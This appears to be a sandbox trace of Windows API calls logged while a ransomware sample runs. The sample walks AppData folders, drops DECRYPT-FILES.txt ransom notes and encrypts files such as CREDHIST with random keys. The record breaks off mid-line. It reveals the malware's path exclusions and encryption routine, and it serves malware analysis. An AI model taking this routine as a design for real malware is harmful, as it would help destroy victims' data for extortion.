[0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="AhnLab") returned 0x0 [0078.200] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.200] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0078.200] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.200] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\\\jkbimi8.tmp") returned 74 [0078.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0078.201] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.201] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\\\DECRYPT-FILES.txt") returned 80 [0078.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.205] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.206] CloseHandle (hObject=0x44c) returned 1 [0078.206] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0078.207] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*" [0078.207] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.207] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.207] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacf9740, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.207] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.207] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacf9740, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.207] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.207] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.207] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.207] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.207] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.208] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0078.208] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.208] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\" [0078.208] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\jkbimi8.tmp" [0078.208] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.208] CloseHandle (hObject=0x0) returned 0 [0078.208] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.208] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacf9740, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0078.208] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0078.208] CloseHandle (hObject=0x448) returned 1 [0078.209] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x541f1c70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x541f1c70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0078.209] lstrcmpW (lpString1="Protect", lpString2=".") returned 1 [0078.209] lstrcmpW (lpString1="Protect", lpString2="..") returned 1 [0078.209] lstrcatW (in: lpString1="Protect", lpString2="\\" | out: lpString1="Protect\\") returned="Protect\\" [0078.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Protect\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Program Files") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch=":\\Windows") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Games\\") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Tor Browser\\") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\ProgramData\\") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\All Users") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\IETldCache\\") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\Local Settings\\") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="\\AppData\\Local") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="AhnLab") returned 0x0 [0078.209] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0078.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0078.209] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.209] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\\\jkbimi8.tmp") returned 76 [0078.209] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0078.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0078.210] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0078.211] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\\\DECRYPT-FILES.txt") returned 82 [0078.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0078.212] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0078.213] CloseHandle (hObject=0x44c) returned 1 [0078.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0078.213] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*" [0078.213] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0078.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.213] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0078.213] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.213] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.213] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf29f8e64, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x138, dwReserved0=0x0, dwReserved1=0x0, cFileName="CREDHIST", cAlternateFileName="")) returned 1 [0078.213] lstrcmpiW (lpString1="CREDHIST", lpString2="DECRYPT-FILES.txt") returned -1 [0078.213] lstrcmpiW (lpString1="CREDHIST", lpString2="autorun.inf") returned 1 [0078.213] lstrcmpiW (lpString1="CREDHIST", lpString2="boot.ini") returned 1 [0078.214] lstrcmpiW (lpString1="CREDHIST", lpString2="desktop.ini") returned -1 [0078.214] lstrcmpiW (lpString1="CREDHIST", lpString2="ntuser.dat") returned -1 [0078.214] lstrcmpiW (lpString1="CREDHIST", lpString2="iconcache.db") returned -1 [0078.214] lstrcmpiW (lpString1="CREDHIST", lpString2="bootsect.bak") returned 1 [0078.214] lstrcmpiW (lpString1="CREDHIST", lpString2="ntuser.dat.log") returned -1 [0078.214] lstrcmpiW (lpString1="CREDHIST", lpString2="thumbs.db") returned -1 [0078.214] lstrcmpiW (lpString1="CREDHIST", lpString2="Bootfont.bin") returned 1 [0078.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned 64 [0078.214] lstrlenW (lpString="CREDHIST") returned 8 [0078.214] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\" [0078.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\", lpString2="CREDHIST" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" [0078.214] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0078.215] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=312) returned 1 [0078.215] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0078.215] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.215] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.216] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.216] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.216] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0078.216] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.217] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.217] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.217] CloseHandle (hObject=0x454) returned 1 [0078.217] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.217] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0078.218] CloseHandle (hObject=0x0) returned 0 [0078.218] CloseHandle (hObject=0x450) returned 1 [0078.219] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.219] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.219] GetTickCount () returned 0x114c0e0 [0078.219] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.220] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.220] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.220] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.220] lstrlenA (lpString="kernel32.dll") returned 12 [0078.220] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.220] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.220] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.220] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.220] lstrlenA (lpString="ADDATOMA") returned 8 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.221] lstrlenA (lpString="ADDATOMW") returned 8 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.221] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.221] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.221] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.221] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.221] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.221] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.221] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.221] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.221] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.221] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.221] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.221] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.221] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.221] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.221] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.221] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.221] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") 